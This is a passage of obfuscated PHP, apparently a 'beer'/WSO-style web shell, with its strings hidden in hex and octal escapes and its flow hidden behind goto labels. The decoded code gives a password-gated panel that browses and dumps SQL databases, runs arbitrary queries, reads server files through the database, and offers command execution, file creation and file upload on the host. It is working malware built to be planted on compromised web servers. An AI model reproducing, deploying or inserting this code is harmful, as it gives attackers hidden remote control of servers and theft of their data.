"\47\76\xa\x3c\x74\x64\76\x3c\x73\145\x6c\x65\x63\164\x20\x6e\x61\x6d\145\75\47\164\x79\x70\145\x27\x3e\74\x6f\x70\164\x69\157\156\x20\x76\141\154\x75\145\x3d\47\x6d\171\x73\161\154\x27\40"; if (@$_POST["\x74\171\x70\145"] == "\x6d\x79\x73\x71\154") { echo "\163\145\154\x65\x63\164\145\x64"; } echo "\76\115\x79\123\161\154\74\57\157\x70\x74\151\x6f\x6e\76\x3c\x6f\160\164\151\x6f\156\x20\166\x61\154\165\x65\x3d\x27\160\147\163\x71\154\47\x20"; if (@$_POST["\x74\x79\160\145"] == "\x70\x67\x73\x71\154") { echo "\x73\145\154\x65\x63\x74\145\x64"; } echo "\76\x50\x6f\163\x74\x67\x72\x65\x53\161\x6c\74\57\157\160\x74\x69\x6f\x6e\76\74\x2f\163\x65\154\x65\x63\164\x3e\74\57\164\x64\76\12\x3c\164\x64\76\x3c\151\156\x70\165\x74\x20\164\171\x70\x65\x3d\x74\x65\x78\164\x20\x6e\x61\x6d\x65\x3d\x73\161\154\x5f\x68\x6f\x73\164\40\166\141\x6c\x75\145\75\x22" . (empty($_POST["\163\x71\154\137\x68\157\163\164"]) ? "\x6c\x6f\143\141\x6c\x68\157\x73\164" : htmlspecialchars($_POST["\163\161\x6c\137\x68\x6f\x73\164"])) . "\42\76\x3c\x2f\164\x64\x3e\12\x3c\x74\144\76\x3c\151\x6e\160\x75\x74\x20\x74\171\x70\x65\x3d\x74\x65\170\164\40\x6e\x61\155\x65\x3d\x73\x71\154\137\154\157\147\x69\x6e\40\x76\x61\154\x75\145\x3d\42" . (empty($_POST["\x73\161\154\x5f\x6c\x6f\147\x69\156"]) ? "\162\157\x6f\x74" : htmlspecialchars($_POST["\x73\161\154\x5f\154\157\147\151\x6e"])) . "\x22\x3e\x3c\57\164\144\x3e\xa\74\x74\144\76\74\151\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\164\x65\x78\x74\x20\x6e\141\x6d\x65\75\x73\x71\154\137\x70\141\163\163\40\166\141\x6c\x75\145\x3d\42" . (empty($_POST["\x73\x71\x6c\x5f\x70\x61\163\163"]) ? '' : htmlspecialchars($_POST["\163\x71\154\137\x70\x61\x73\x73"])) . "\42\76\74\x2f\x74\144\76\x3c\x74\x64\x3e"; $tmp = "\x3c\151\156\160\165\x74\x20\x74\x79\160\x65\x3d\x74\x65\170\164\40\156\141\155\x65\75\x73\161\154\x5f\142\x61\x73\145\40\x76\x61\154\x75\x65\x3d\x27\x27\x3e"; if (isset($_POST["\163\161\154\x5f\150\157\x73\x74"])) { if ($db->connect($_POST["\x73\x71\x6c\x5f\x68\157\x73\164"], $_POST["\x73\x71\154\137\154\157\x67\x69\x6e"], $_POST["\x73\x71\154\x5f\160\x61\x73\163"], $_POST["\163\161\x6c\137\x62\x61\x73\145"])) { switch ($_POST["\143\163\x65\x74"]) { case "\127\151\x6e\x64\157\167\163\x2d\x31\x32\x35\x31": $db->setcset("\143\166\x61\164\x32\65\x31"); break; case "\125\x54\106\55\x38": $db->setcset("\165\164\x66\x38"); break; case "\113\x4f\111\x38\55\x52": $db->setcset("\153\157\x69\70\x72"); break; case "\113\117\x49\70\55\x55": $db->setcset("\153\x6f\151\70\x75"); break; case "\x63\160\x38\x36\x36": $db->setcset("\143\160\x38\66\x36"); break; } $db->listDbs(); echo "\74\163\x65\154\x65\143\164\x20\x6e\141\155\x65\75\163\161\x6c\x5f\142\x61\163\145\76\74\x6f\x70\164\151\x6f\156\40\x76\141\154\165\x65\x3d\x27\x27\76\x3c\57\157\x70\164\x69\x6f\156\x3e"; while ($item = $db->fetch()) { list($key, $value) = each($item); echo "\74\157\160\x74\x69\157\156\x20\x76\x61\154\165\x65\75\x22" . $value . "\x22\40" . ($value == $_POST["\x73\x71\x6c\x5f\142\x61\x73\x65"] ? "\163\145\154\x65\x63\164\145\x64" : '') . "\x3e" . $value . "\74\x2f\x6f\160\x74\151\x6f\156\76"; } echo "\x3c\x2f\163\145\x6c\x65\x63\164\76"; } else { echo $tmp; } } else { echo $tmp; } echo "\x3c\x2f\164\144\x3e\12\11\x9\x9\x9\x3c\164\x64\76\x3c\x69\156\x70\165\164\40\x74\x79\x70\x65\x3d\x73\165\142\x6d\x69\x74\40\166\x61\x6c\165\145\x3d\47\x3e\76\47\40\157\156\x63\x6c\151\143\x6b\75\47\x66\x73\50\x64\x2e\163\x66\x29\x3b\x27\76\x3c\57\x74\x64\76\12\x20\40\40\40\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x3c\164\144\x3e\74\151\156\160\165\164\x20\x74\171\160\145\x3d\x63\150\x65\x63\x6b\x62\157\170\x20\156\x61\155\145\75\x73\161\154\x5f\x63\x6f\x75\x6e\164\40\x76\x61\154\x75\x65\75\x27\157\x6e\47" . (empty($_POST["\x73\161\x6c\137\x63\157\165\156\164"]) ? '' : "\40\143\x68\x65\x63\153\145\144") . "\x3e\x20\x63\x6f\x75\x6e\x74\40\164\x68\145\40\x6e\165\x6d\x62\x65\162\x20\x6f\146\40\x72\x6f\167\163\74\x2f\164\x64\x3e\xa\x9\x9\x9\74\57\164\x72\x3e\12\11\11\74\57\x74\x61\142\154\145\x3e\12\x9\x9\74\x73\143\x72\x69\x70\164\76\12\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x73\x5f\144\142\x3d\47" . @addslashes($_POST["\x73\x71\x6c\x5f\142\x61\163\x65"]) . "\x27\x3b\12\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\x66\x75\x6e\143\x74\x69\157\x6e\40\x66\x73\50\x66\51\40\x7b\xa\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\40\40\x69\x66\x28\x66\56\x73\161\x6c\137\x62\141\163\x65\56\x76\x61\x6c\x75\145\41\x3d\163\137\144\x62\51\40\x7b\x20\146\x2e\x6f\156\x73\165\x62\155\x69\164\x20\x3d\40\x66\165\x6e\x63\x74\151\157\x6e\x28\51\x20\x7b\175\73\xa\40\x20\40\40\40\40\x20\40\x20\40\x20\x20\40\40\40\x20\40\40\40\40\x69\146\50\x66\x2e\x76\x61\164\51\x20\x66\56\166\141\x74\56\x76\141\154\165\145\x3d\47\47\x3b\xa\40\x20\40\40\40\40\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\151\146\x28\x66\56\x77\141\x74\x29\40\146\56\167\141\x74\56\x76\141\154\x75\x65\75\x27\x27\73\xa\40\40\x20\40\x20\x20\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x69\146\x28\x66\56\170\x61\x74\x29\40\146\x2e\170\141\x74\56\166\141\154\165\145\75\47\47\x3b\12\40\x20\40\40\x20\40\40\x20\40\40\x20\40\40\40\40\40\175\xa\x20\x20\40\40\40\40\x20\40\x20\40\x20\40\175\12\x9\11\11\x66\x75\x6e\143\x74\151\157\156\x20\163\x74\50\x74\x2c\154\51\40\173\xa\x9\x9\11\11\144\x2e\x73\x66\56\x76\x61\x74\56\x76\141\154\x75\x65\40\x3d\x20\47\x73\x65\x6c\145\x63\164\47\x3b\xa\x9\11\x9\11\144\x2e\x73\x66\56\x77\141\x74\x2e\x76\141\154\165\145\40\75\x20\x74\x3b\12\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\151\146\x28\x6c\x20\46\46\40\x64\56\x73\x66\x2e\170\141\164\51\x20\144\x2e\x73\146\x2e\x78\141\x74\56\x76\141\154\x75\x65\x20\75\40\154\73\xa\x9\11\x9\x9\144\56\163\146\56\163\x75\x62\155\x69\x74\x28\x29\x3b\12\11\x9\x9\x7d\12\x9\x9\x9\x66\x75\x6e\143\x74\151\x6f\156\40\151\163\50\x29\x20\x7b\12\11\11\x9\11\x66\x6f\x72\x28\x69\75\x30\73\x69\x3c\144\56\163\x66\x2e\x65\154\145\155\145\156\164\163\x5b\47\x74\x62\154\133\x5d\47\135\x2e\154\145\156\147\164\150\73\x2b\x2b\151\51\12\x9\x9\11\11\11\144\x2e\163\x66\56\145\x6c\145\155\145\x6e\164\163\133\x27\x74\x62\x6c\133\x5d\47\135\x5b\x69\135\x2e\143\x68\x65\143\x6b\x65\x64\40\x3d\x20\x21\144\x2e\x73\146\x2e\x65\x6c\145\155\x65\x6e\x74\x73\133\47\x74\x62\x6c\133\135\47\x5d\133\151\x5d\x2e\143\150\x65\143\x6b\145\x64\73\12\x9\x9\x9\x7d\xa\x9\11\x3c\57\163\143\162\151\160\x74\x3e"; if (isset($db) && $db->link) { echo "\x3c\142\162\x2f\x3e\74\x74\141\142\154\x65\x20\x77\151\144\164\x68\75\x31\60\x30\45\40\x63\145\154\x6c\160\141\144\144\x69\x6e\147\75\x32\40\x63\x65\154\154\x73\160\141\x63\x69\156\147\x3d\60\x3e"; if (!empty($_POST["\x73\161\x6c\x5f\142\x61\x73\x65"])) { $db->selectdb($_POST["\x73\161\154\137\x62\141\x73\145"]); echo "\x3c\164\162\x3e\74\164\144\40\167\151\144\x74\x68\75\61\x20\163\x74\171\154\x65\x3d\47\142\x6f\162\x64\145\162\x2d\164\157\160\x3a\x32\160\170\40\163\x6f\154\x69\144\x20\x23\66\x36\x36\x3b\47\x3e\x3c\x73\160\141\x6e\76\124\141\142\x6c\145\163\72\x3c\57\x73\x70\141\156\x3e\x3c\x62\162\x3e\x3c\142\162\x3e"; $tbls_res = $db->listTables(); while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["\163\161\x6c\x5f\143\x6f\165\x6e\x74"])) { $n = $db->fetch($db->query("\x53\x45\x4c\105\103\x54\40\103\117\x55\116\x54\x28\x2a\x29\x20\x61\163\x20\156\40\106\122\117\x4d\40" . $value . '')); } $value = htmlspecialchars($value); echo "\74\x6e\x6f\x62\162\76\x3c\151\x6e\x70\x75\164\40\164\x79\x70\145\x3d\x27\x63\x68\145\x63\153\x62\157\x78\x27\x20\156\x61\155\x65\x3d\x27\164\x62\x6c\x5b\x5d\x27\x20\x76\141\154\x75\x65\x3d\47" . $value . "\x27\76\x26\x6e\x62\x73\160\x3b\x3c\x61\x20\150\162\145\x66\x3d\43\40\x6f\156\143\154\x69\143\x6b\75\42\163\x74\x28\x27" . $value . "\47\x2c\x31\x29\42\x3e" . $value . "\x3c\57\141\x3e" . (empty($_POST["\x73\x71\154\137\143\157\x75\156\x74"]) ? "\x26\156\142\x73\x70\x3b" : "\x20\74\163\155\141\x6c\154\x3e\50{$n["\156"]}\x29\x3c\x2f\163\x6d\141\154\154\x3e") . "\74\x2f\156\x6f\142\x72\76\74\142\162\x3e"; } echo "\74\151\156\x70\x75\x74\40\164\x79\160\x65\x3d\47\x63\x68\145\143\153\142\x6f\170\47\x20\x6f\156\143\154\151\x63\153\x3d\47\x69\163\50\x29\x3b\x27\x3e\x20\74\151\x6e\x70\165\x74\x20\x74\x79\160\x65\75\142\x75\164\x74\x6f\156\x20\x76\141\x6c\x75\145\75\x27\104\x75\x6d\160\x27\40\x6f\x6e\143\154\x69\x63\x6b\75\x27\x64\157\143\x75\155\x65\x6e\164\56\x73\146\x2e\167\x61\164\x2e\166\x61\x6c\165\145\x3d\42\x64\x6f\x77\156\154\x6f\141\144\42\73\144\157\143\165\x6d\x65\156\x74\x2e\163\146\56\x73\165\142\155\151\164\x28\51\x3b\x27\76\x3c\x62\162\76\106\151\x6c\145\40\x70\141\x74\x68\72\x3c\x69\156\x70\x75\164\40\164\171\x70\x65\75\x74\x65\x78\x74\40\x6e\x61\155\145\75\x66\x69\x6c\145\40\x76\141\154\165\145\75\47\144\165\x6d\160\56\x73\x71\154\47\76\x3c\x2f\x74\144\76\74\164\144\x20\x73\164\171\154\145\x3d\x27\x62\157\162\144\145\x72\x2d\164\x6f\160\x3a\62\x70\170\x20\x73\157\x6c\151\144\40\43\66\66\66\73\x27\76"; if (@$_POST["\166\x61\164"] == "\163\145\154\x65\x63\164") { $_POST["\x76\x61\x74"] = "\161\165\x65\x72\x79"; $_POST["\x78\x61\164"] = $_POST["\170\141\164"] ? $_POST["\170\x61\164"] : 1; $db->query("\x53\105\114\x45\x43\x54\40\103\117\x55\116\124\x28\x2a\51\40\141\163\40\156\x20\106\x52\x4f\115\40" . $_POST["\x77\x61\164"]); $num = $db->fetch(); $pages = ceil($num["\x6e"] / 30); echo "\x3c\163\x63\x72\x69\x70\x74\x3e\x64\x2e\x73\x66\56\157\156\x73\165\142\155\151\164\x3d\146\165\x6e\x63\x74\x69\x6f\156\50\51\x7b\163\x74\x28\x22" . $_POST["\x77\141\164"] . "\x22\x2c\x20\144\56\163\x66\x2e\170\x61\x74\x2e\166\x61\x6c\x75\x65\51\175\74\57\x73\143\162\x69\x70\x74\76\x3c\163\x70\x61\x6e\76" . $_POST["\x77\141\164"] . "\x3c\57\x73\x70\141\x6e\x3e\x20\x28{$num["\156"]}\40\162\145\x63\157\162\144\x73\51\40\x50\141\147\145\x20\x23\x20\74\151\156\x70\165\164\40\x74\x79\160\145\x3d\164\x65\x78\x74\40\x6e\141\x6d\145\x3d\x27\x78\x61\164\47\40\166\141\154\x75\x65\75" . (int) $_POST["\x78\141\164"] . "\x3e"; echo "\40\157\146\40{$pages}"; if ($_POST["\x78\x61\x74"] > 1) { echo "\x20\x3c\141\40\150\x72\145\x66\x3d\x23\40\x6f\x6e\x63\154\x69\143\x6b\x3d\x27\163\x74\50\x22" . $_POST["\167\x61\164"] . "\x22\54\40" . ($_POST["\170\x61\164"] - 1) . "\x29\x27\x3e\46\154\164\x3b\x20\x50\162\145\166\74\57\x61\x3e"; } if ($_POST["\x78\141\x74"] < $pages) { echo "\x20\74\x61\x20\150\162\145\146\x3d\43\x20\157\x6e\143\x6c\151\x63\153\x3d\47\x73\x74\x28\x22" . $_POST["\x77\141\x74"] . "\x22\x2c\x20" . ($_POST["\170\141\164"] + 1) . "\x29\47\x3e\x4e\145\x78\164\x20\x26\x67\x74\x3b\x3c\57\141\x3e"; } $_POST["\x78\141\x74"]--; if ($_POST["\164\171\x70\x65"] == "\x70\x67\163\x71\154") { $_POST["\x77\x61\164"] = "\x53\105\114\105\x43\x54\x20\x2a\40\106\122\x4f\x4d\40" . $_POST["\x77\x61\x74"] . "\40\x4c\111\115\111\x54\x20\x33\60\40\117\x46\106\123\x45\x54\40" . $_POST["\x78\141\x74"] * 30; } else { $_POST["\x77\x61\164"] = "\x53\105\114\x45\x43\124\40\x2a\x20\106\x52\117\x4d\40\x60" . $_POST["\167\141\x74"] . "\140\40\114\111\x4d\111\x54\x20" . $_POST["\170\141\x74"] * 30 . "\x2c\63\x30"; } echo "\74\x62\x72\x3e\74\x62\x72\x3e"; } if (@$_POST["\166\141\164"] == "\x71\x75\x65\x72\x79" && !empty($_POST["\167\x61\x74"])) { $db->query(@$_POST["\x77\x61\164"]); if ($db->res !== false) { $title = false; echo "\x3c\x74\x61\142\x6c\x65\x20\167\151\144\x74\150\x3d\x31\x30\60\x25\40\x63\x65\154\154\163\160\141\143\x69\x6e\x67\75\61\x20\x63\145\154\154\160\141\144\144\151\156\x67\75\62\40\x63\154\141\x73\x73\75\155\141\151\x6e\x20\163\164\171\154\x65\x3d\x22\x62\x61\x63\x6b\147\x72\157\x75\x6e\144\55\x63\x6f\x6c\157\x72\72\43\x32\71\62\71\62\x39\42\x3e"; $line = 1; while ($item = $db->fetch()) { if (!$title) { echo "\74\x74\162\76"; foreach ($item as $key => $value) { echo "\74\x74\x68\76" . $key . "\x3c\57\164\150\76"; } reset($item); $title = true; echo "\74\x2f\164\x72\x3e\74\164\162\x3e"; $line = 2; } echo "\x3c\x74\x72\40\143\154\141\163\x73\x3d\x22\x6c" . $line . "\42\76"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "\74\164\x64\76\74\x69\x3e\156\x75\x6c\154\74\57\151\x3e\x3c\x2f\164\x64\x3e"; } else { echo "\x3c\x74\144\76" . nl2br(htmlspecialchars($value)) . "\74\57\x74\x64\76"; } } echo "\x3c\x2f\x74\162\76"; } echo "\x3c\x2f\164\141\142\x6c\145\x3e"; } else { echo "\x3c\x64\x69\x76\76\x3c\x62\76\x45\162\x72\x6f\x72\x3a\74\57\142\76\x20" . htmlspecialchars($db->error()) . "\x3c\57\x64\151\166\76"; } } echo "\74\142\x72\76\74\57\146\157\162\155\76\x3c\x66\x6f\162\155\x20\157\156\x73\165\x62\x6d\151\164\75\47\144\x2e\163\x66\56\x76\141\164\x2e\166\141\154\165\x65\75\x22\161\165\145\162\x79\42\73\144\56\163\146\56\167\x61\x74\56\166\x61\154\165\145\x3d\x74\150\151\x73\x2e\161\165\x65\x72\x79\56\x76\x61\154\x75\x65\73\x64\157\143\165\155\145\156\164\56\163\146\x2e\163\x75\142\155\151\x74\x28\x29\73\162\x65\x74\x75\162\156\x20\x66\141\x6c\163\x65\x3b\x27\x3e\x3c\164\145\x78\x74\x61\x72\145\x61\x20\156\x61\155\x65\75\47\x71\x75\x65\162\x79\47\40\x73\x74\x79\154\145\x3d\47\x77\151\x64\164\150\72\x31\60\60\x25\x3b\x68\145\x69\147\150\164\x3a\61\60\60\160\x78\47\76"; if (!empty($_POST["\167\141\x74"]) && $_POST["\x76\x61\x74"] != "\x6c\x6f\x61\144\x66\x69\x6c\x65") { echo htmlspecialchars($_POST["\x77\x61\164"]); } echo "\74\x2f\x74\x65\170\x74\141\162\145\141\x3e\x3c\x62\x72\x2f\76\x3c\x69\x6e\x70\x75\x74\40\164\171\160\x65\75\x73\165\x62\x6d\x69\x74\x20\166\141\x6c\165\145\75\47\105\x78\145\143\165\x74\x65\47\x3e"; echo "\74\x2f\164\144\x3e\x3c\57\164\162\x3e"; } echo "\74\57\x74\141\x62\154\145\x3e\74\57\146\157\162\155\76\x3c\x62\162\57\76"; if ($_POST["\164\171\160\145"] == "\x6d\x79\x73\x71\x6c") { $db->query("\123\x45\114\105\x43\124\40\x31\40\106\122\x4f\x4d\40\155\171\163\161\x6c\x2e\165\x73\145\162\40\x57\x48\105\122\105\40\x63\157\156\x63\141\164\50\140\165\163\x65\162\x60\54\x20\47\100\x27\54\40\140\x68\157\x73\164\x60\x29\x20\x3d\x20\x55\123\105\122\50\x29\x20\x41\116\104\x20\140\106\151\x6c\x65\137\160\x72\x69\166\140\x20\75\40\x27\171\x27"); if ($db->fetch()) { echo "\74\x66\157\x72\x6d\x20\157\156\163\165\x62\155\x69\x74\x3d\x27\x64\56\163\146\x2e\x76\141\x74\x2e\166\141\154\x75\x65\75\x22\x6c\x6f\x61\144\146\x69\154\145\x22\73\x64\157\143\x75\x6d\x65\x6e\164\56\163\x66\x2e\x77\x61\164\x2e\166\141\x6c\x75\x65\75\164\x68\151\x73\x2e\x66\56\x76\141\154\165\145\73\144\157\x63\x75\x6d\145\156\164\56\163\x66\x2e\x73\165\142\x6d\x69\x74\x28\51\x3b\162\x65\x74\x75\162\x6e\x20\x66\141\x6c\x73\x65\x3b\47\x3e\74\163\160\141\156\x3e\114\x6f\x61\144\x20\x66\x69\154\145\x3c\57\x73\160\x61\x6e\x3e\x20\x3c\151\156\160\165\164\x20\40\x63\154\141\163\163\75\47\164\157\x6f\154\x73\x49\x6e\x70\x27\40\x74\x79\160\x65\75\x74\x65\x78\x74\40\x6e\141\155\x65\x3d\146\x3e\x3c\151\156\x70\x75\x74\x20\164\x79\160\145\75\x73\x75\142\x6d\x69\x74\40\x76\x61\x6c\x75\145\x3d\47\x3e\76\47\x3e\x3c\57\146\x6f\x72\x6d\76"; } } if (@$_POST["\x76\x61\x74"] == "\154\157\141\144\x66\151\x6c\x65") { $file = $db->loadFile($_POST["\x77\x61\164"]); echo "\x3c\x62\162\x2f\x3e\74\160\162\145\x20\x63\x6c\x61\163\x73\75\155\154\61\76" . htmlspecialchars($file["\x66\x69\x6c\145"]) . "\74\57\x70\162\x65\76"; } } else { echo htmlspecialchars($db->error()); } echo "\74\x2f\x64\x69\x76\76"; beer_Footer(); } goto gGYGb; YH0Lz: if (!empty($auth_pass)) { if (isset($_POST["\160\141\163\163"]) && md5($_POST["\x70\x61\x73\163"]) == $auth_pass) { BEER_setcookie(md5($_SERVER["\110\x54\x54\120\137\110\117\123\x54"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["\x48\124\x54\120\137\110\x4f\123\124"])]) || $_COOKIE[md5($_SERVER["\110\124\x54\120\x5f\110\117\123\124"])] != $auth_pass) { beer_Login(); } } goto pOK6k; gZrfO: if (isset($_POST["\143\141\x74"])) { @chdir($_POST["\143\141\x74"]); } goto kXAlX; hp9Oh: $default_cset = "\127\151\156\x64\x6f\167\x73\x2d\x31\62\x35\x31"; goto nkYjX; Bl3SU: @set_time_limit(0); goto ijDC4; bDLDc: if ($cwd[strlen($cwd) - 1] != "\57") { $cwd .= "\x2f"; } goto KmmG0; qARST: function beer_Footer() { $is_writable = is_writable($GLOBALS["\x63\167\144"]) ? "\x20\x3c\x66\157\156\x74\x20\143\x6f\x6c\x6f\162\x3d\x27\147\x72\145\145\x6e\47\x3e\x28\127\162\151\x74\145\x61\x62\154\x65\x29\74\57\146\x6f\156\164\76" : "\40\74\x66\x6f\156\x74\x20\x63\x6f\154\157\x72\75\x72\x65\x64\76\x28\x4e\x6f\164\40\x77\x72\x69\x74\141\142\x6c\145\51\x3c\57\146\x6f\x6e\x74\76"; echo "\12\74\x2f\144\151\166\x3e\12\74\164\x61\142\x6c\x65\40\x63\x6c\x61\163\163\75\x69\x6e\146\x6f\40\x69\144\x3d\x74\157\157\154\163\x54\142\x6c\x20\x63\x65\x6c\154\x70\x61\x64\144\x69\156\x67\75\63\x20\143\145\154\x6c\x73\x70\141\x63\x69\156\x67\x3d\x30\40\x77\151\x64\x74\150\x3d\x31\x30\60\x25\40\x20\x73\164\x79\x6c\145\75\x27\142\157\x72\x64\145\x72\x2d\164\157\160\72\62\x70\170\40\163\x6f\154\151\144\40\43\x33\63\x33\73\x62\x6f\162\144\145\162\x2d\x62\x6f\x74\x74\157\x6d\72\62\160\170\x20\163\157\154\151\x64\40\43\63\x33\63\73\47\x3e\xa\x9\x3c\164\x72\x3e\12\11\11\74\x74\x64\x3e\x3c\146\x6f\x72\x6d\x20\157\x6e\x73\165\142\155\x69\164\75\47\x67\x28\x6e\x75\154\x6c\x2c\x74\x68\151\x73\x2e\143\x2e\x76\x61\154\x75\145\54\42\x22\51\x3b\162\145\164\165\x72\x6e\40\x66\141\154\x73\x65\73\x27\76\x3c\x73\x70\141\x6e\76\103\x68\141\x6e\147\145\40\x64\x69\x72\x3a\74\57\163\160\141\x6e\76\x3c\x62\162\76\x3c\x69\156\x70\165\164\x20\143\154\x61\163\163\75\x27\x74\x6f\x6f\154\163\111\156\160\47\x20\164\x79\x70\145\75\164\x65\x78\164\x20\x6e\141\x6d\145\75\143\x20\x76\x61\x6c\165\145\x3d\x27" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\47\76\74\x69\x6e\x70\165\164\x20\164\x79\x70\145\x3d\163\x75\142\x6d\x69\164\x20\x76\141\154\x75\x65\x3d\47\x3e\x3e\47\76\x3c\57\146\x6f\162\x6d\76\74\x2f\x74\x64\x3e\xa\11\x9\x3c\164\144\x3e\74\146\157\x72\155\x20\157\x6e\163\165\x62\x6d\151\164\75\x22\x67\50\x27\x46\151\x6c\145\163\x54\x6f\157\154\x73\x27\x2c\156\x75\154\154\54\164\x68\151\x73\56\x66\x2e\x76\141\154\165\x65\51\73\162\145\x74\x75\162\156\x20\146\141\154\x73\x65\x3b\x22\x3e\x3c\x73\x70\x61\156\76\x52\x65\x61\144\x20\146\151\x6c\145\72\74\x2f\x73\160\141\156\x3e\74\142\162\x3e\74\151\156\160\x75\x74\40\x63\154\141\163\x73\x3d\x27\x74\x6f\x6f\x6c\x73\111\x6e\x70\47\x20\x74\171\160\145\x3d\x74\x65\x78\164\40\156\x61\155\x65\75\x66\76\x3c\151\x6e\160\x75\x74\x20\164\x79\x70\x65\75\163\165\x62\x6d\x69\x74\40\x76\x61\154\165\x65\75\x27\x3e\x3e\47\x3e\x3c\x2f\x66\157\162\x6d\x3e\x3c\x2f\x74\144\x3e\xa\x9\74\x2f\x74\162\x3e\74\164\162\x3e\xa\x9\11\x3c\164\x64\x3e\x3c\146\157\x72\155\x20\x6f\x6e\x73\165\142\155\x69\x74\x3d\x22\147\50\47\x46\x69\x6c\145\163\x4d\141\x6e\x27\54\156\165\x6c\154\54\x27\x6d\x6b\x64\x69\162\x27\54\x74\150\151\x73\56\x64\56\166\141\154\165\x65\51\x3b\162\x65\164\165\162\156\40\146\141\154\x73\x65\73\x22\x3e\x3c\163\160\141\x6e\76\x4d\141\x6b\x65\x20\x64\x69\162\72\x3c\x2f\x73\x70\x61\x6e\76{$is_writable}\74\142\x72\76\x3c\x69\156\x70\x75\x74\40\x63\154\141\x73\163\x3d\x27\164\157\x6f\154\x73\x49\x6e\x70\x27\x20\x74\171\x70\145\x3d\x74\x65\x78\x74\40\156\141\x6d\145\75\144\76\x3c\x69\x6e\x70\x75\164\x20\164\x79\160\145\75\163\165\x62\155\x69\164\40\x76\141\154\x75\x65\x3d\47\76\x3e\47\x3e\x3c\x2f\146\x6f\162\155\76\74\x2f\164\x64\x3e\12\x9\11\x3c\x74\144\x3e\x3c\x66\x6f\162\x6d\40\x6f\x6e\x73\x75\x62\x6d\x69\164\x3d\x22\x67\x28\47\106\151\x6c\x65\163\x54\x6f\157\x6c\x73\x27\54\156\165\154\154\54\164\x68\x69\x73\56\146\x2e\166\141\154\x75\145\54\47\155\x6b\146\x69\x6c\x65\47\x29\73\x72\145\x74\165\x72\x6e\40\146\141\x6c\163\x65\x3b\x22\x3e\x3c\x73\x70\141\x6e\x3e\115\x61\153\145\40\146\x69\154\145\x3a\x3c\57\163\x70\141\156\x3e{$is_writable}\x3c\142\162\x3e\74\151\156\x70\165\164\40\143\154\x61\163\x73\x3d\47\164\157\157\x6c\x73\111\x6e\160\x27\40\164\x79\160\145\75\x74\x65\170\164\40\156\141\x6d\145\x3d\x66\76\74\x69\x6e\160\165\x74\40\x74\x79\x70\145\x3d\x73\165\x62\155\151\164\x20\x76\x61\x6c\x75\145\75\47\76\76\x27\76\74\x2f\146\x6f\x72\x6d\x3e\x3c\x2f\x74\144\76\xa\11\x3c\57\x74\162\x3e\x3c\164\x72\x3e\xa\x9\x9\x3c\x74\144\x3e\x3c\x66\x6f\162\155\40\157\156\163\165\142\x6d\x69\x74\75\42\147\50\x27\x43\157\x6e\163\x6f\x6c\145\x27\x2c\156\x75\x6c\154\54\x74\150\151\163\x2e\x63\x2e\x76\x61\x6c\x75\145\51\73\162\x65\164\165\x72\156\x20\x66\x61\154\x73\x65\73\42\76\74\163\x70\x61\x6e\x3e\105\x78\145\x63\165\164\x65\72\x3c\x2f\163\x70\141\156\x3e\x3c\142\x72\x3e\74\151\156\160\165\164\x20\143\154\x61\163\x73\x3d\x27\x74\x6f\x6f\154\163\x49\156\160\47\x20\164\171\160\145\x3d\164\x65\x78\164\40\x6e\141\x6d\x65\x3d\143\40\166\x61\x6c\165\x65\75\47\47\x3e\74\x69\156\160\x75\x74\x20\x74\x79\160\x65\75\x73\x75\142\x6d\151\164\40\x76\x61\x6c\x75\x65\x3d\47\x3e\76\47\76\74\x2f\x66\157\162\155\x3e\x3c\57\164\144\x3e\12\x9\11\74\x74\x64\x3e\x3c\146\157\162\155\x20\155\x65\x74\x68\x6f\144\75\47\x70\x6f\163\x74\x27\40\x45\116\103\x54\x59\120\105\x3d\x27\155\165\x6c\164\151\160\141\162\x74\x2f\146\x6f\x72\x6d\55\144\141\164\x61\x27\x3e\xa\x9\x9\x3c\x69\x6e\x70\x75\164\x20\164\x79\x70\145\x3d\150\x69\x64\x64\x65\156\x20\x6e\x61\155\145\x3d\x61\40\x76\141\154\x75\x65\75\47\106\x69\154\x65\163\x4d\141\x6e\x27\x3e\12\x9\11\x3c\151\156\160\165\164\x20\164\171\x70\145\x3d\x68\x69\x64\x64\x65\156\x20\x6e\141\x6d\x65\75\x63\x20\x76\141\x6c\x75\145\x3d\47" . $GLOBALS["\x63\167\x64"] . "\x27\76\xa\x9\x9\74\x69\x6e\160\165\164\x20\x74\x79\x70\x65\75\150\151\x64\144\x65\x6e\x20\x6e\x61\x6d\x65\75\x76\x61\x74\x20\166\x61\x6c\x75\145\x3d\x27\165\160\154\157\141\x64\106\x69\x6c\x65\47\x3e\xa\x9\11\74\151\x6e\160\165\x74\40\164\x79\x70\145\75\150\151\x64\x64\x65\156\x20\x6e\141\155\145\x3d\x63\x73\145\164\40\x76\x61\x6c\165\145\x3d\47" . (isset($_POST["\x63\x73\145\x74"]) ? $_POST["\143\163\x65\x74"] : '') . "\47\x3e\12\x9\11\x3c\x73\x70\141\156\x3e\x55\160\154\157\x61\x64\40\146\x69\154\145\72\74\x2f\x73\160\x61\156\76{$is_writable}\x3c\x62\162\76\x3c\x69\x6e\x70\165\x74\x20\143\x6c\141\163\x73\x3d\x27\x74\157\157\154\x73\111\156\x70\x27\40\x74\x79\160\x65\x3d\146\151\x6c\x65\40\x6e\141\155\x65\x3d\146\76\x3c\x69\156\160\165\x74\40\164\x79\160\145\75\x73\x75\142\x6d\151\164\40\166\x61\154\165\145\x3d\47\x3e\76\47\x3e\x3c\x2f\x66\157\162\155\x3e\74\142\162\40\x20\76\74\x2f\x74\144\76\xa\x9\74\x2f\164\x72\76\x3c\57\164\x61\x62\x6c\x65\x3e\74\x2f\144\x69\166\76\74\57\x62\x6f\144\171\76\x3c\x2f\x68\164\x6d\154\x3e"; } goto EEA0l; QmPpR: function actionStringTools() { if (!function_exists("\150\145\170\62\x62\x69\x6e")) { function hex2bin($p) { return decbin(hexdec($p)); } } if 